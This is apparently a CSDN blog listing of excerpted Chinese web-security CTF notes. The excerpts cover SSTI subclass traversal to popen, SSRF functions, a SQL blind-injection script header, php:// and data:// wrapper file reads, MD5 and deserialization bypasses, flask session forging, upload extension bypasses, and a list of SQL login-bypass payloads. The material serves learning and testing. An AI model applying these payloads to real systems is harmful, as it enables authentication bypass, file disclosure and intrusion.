![](https://img-blog.csdnimg.cn/20201014180756916.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web
white_&_black
这个作者很懒,什么都没留下…
展开
-
敏感信息收集
敏感信息收集敏感信息相关文件robots.txtindex.php~.index.php.swpindex.php.swpindex.php.bak.index.php~index.php.bak_Edietplusindex.php.~index.php.~1~index.phpindex.php~index.php.rarindex.php.zipindex.php.7zindex.php.tar.gzwww.zipwww.rarwww.zipwww.7zwww原创 2021-09-09 16:26:18 · 583 阅读 · 0 评论 -
服务器模板注入 (SSTI)
服务器模板注入 (SSTI)基本注入流程''.__class__ 显示这个东西的类''.__class__.base__ 找到这个的基类''.__class__.__base__.__subclasses__() 看基类的子类敏感子类popen、sys、os因为''.__class__.__base__.__subclasses__()返回的是一个列表,所以直接''.__class__.__base__.__subclasses__()[425]查看的就是popen这个注意原创 2021-09-08 18:29:39 · 279 阅读 · 0 评论 -
SSRF相关知识点总结
SSRF(Server-Side Request Forgery)服务端请求为伪造一、容易产生SSRF漏洞的函数file_get_contents()、fsockopen()、curl_exec()1、file_get_contents()该函数的作用是将整个文件读入一个字符串中<?php if(isset($_POST['url'])) { $content=file_get_contents($_POST['url']); $filen原创 2021-08-20 10:37:41 · 559 阅读 · 0 评论 -
sql盲注脚本
盲注脚本POST型from time import sleepimport requestss = requests.Session()url = '******'flag = ''class Solution: # 数据库名 def function_database(self,left_num, compare_str_num): payload = f"/**/or/**/ord(right(left((database()),{left_num}原创 2021-08-14 17:32:59 · 194 阅读 · 0 评论 -
php伪协议
常见伪协议filter伪协议一般用来读取文件?file=php://filter/convert.base64-encode/resource=index.phpdata伪协议if(isset($text)&&(file_get_contents($text,'r')==="ctf")){ echo $flag;}在这种情况下,file_get_contents()要求读取文件内容到一个字符串,但这里没没有文件,而要读取text变量,使用data伪协议绕过?te原创 2021-08-10 12:24:02 · 115 阅读 · 0 评论 -
关于MD5函数的绕过
MD5一、md5($password,true)导致的注入某次刷题中遇到返回包有这个HTTP/1.1 200 OKServer: openrestyDate: Mon, 09 Aug 2021 10:08:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeHint: select * from 'admin' where password=md5($pass,true)X-Powered-By: PHP/7.3.13原创 2021-08-09 18:33:33 · 1031 阅读 · 0 评论 -
flask session伪造admin身份
flask session 伪造准备工作需要先找是否有SECRET_KEYpython脚本可以把flask的session解密出来,但是如果想要加密伪造生成自己的session的话,还需要知道flask用来签名的SECRET_KEY假设当前的SECRET_KEY是 ckj123安装缺少的module注意:第一次弄的时候没有很多module,会报这样类似的错ImportError: No module named ‘itsdangerous’直接安装对应modulepip ins原创 2021-08-09 17:37:31 · 3887 阅读 · 3 评论 -
sql注入基本流程
判断注入类型数字型注入?id=2' 返回错误,未对单引号作处理?id=2 and 1=1 运行正常?id=2 and 1=2 运行异常字符型注入?username=admin' 返回错误,未对单引号作处理?username=admin' and '1'='1 运行正常?username=admin' and '1'='2 运行异常注意:下面为示例都是字符型注入判断字段长度?id=1' o原创 2021-08-06 11:12:07 · 169 阅读 · 0 评论 -
文件上传常见绕过
文件上传常见PHP后缀php2, php3, php4, php5, phps, pht, phtm, phtml原创 2021-08-05 11:42:05 · 937 阅读 · 0 评论 -
反序列化函数绕过
__wakeup()方法绕过函数作用:与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。绕过方法:当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。<?phpclass Name{ private $username = 'admin'; private $password = 100;}$a = new Name();$str = seria转载 2021-08-05 10:26:55 · 642 阅读 · 0 评论 -
public、protected与private在序列化时的区别
public、protected与private在序列化时的区别<?php class aaa{ public $temp=111; public $filename="test_a"; } class bbb{ protected $temp=222; protected $filename="test_b"; } class ccc{ private $temp=转载 2021-08-05 10:09:04 · 709 阅读 · 1 评论 -
.htaccess文件和.user.ini文件
htaccess文件:以下关于htaccess内容来自百度概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。Unix、Linux系统或者是任何版本的Apache Web服务器都是支持.htaccess的,但是有的主机服务商可能不允许你自定义自己的.htaccess文件。启用.htacces转载 2021-02-10 12:31:05 · 301 阅读 · 0 评论 -
万能密码
sql万能密码admin' or 1=1#'or 1=1"or "a"="a"or 1=1--"or"=""or"="a'='a"or1=1--"or=or"''or'='or'') or ('a'='a'.).or.('.a.'='.a'or 1=1'or 1=1--'or 1=1/*'or"="a'='a'or' '1'='1''or''=''or''=''or''=''or'='1''or'='or''or.'a.'='a'or1=1--1'or'1'='转载 2021-02-01 12:34:42 · 1381 阅读 · 0 评论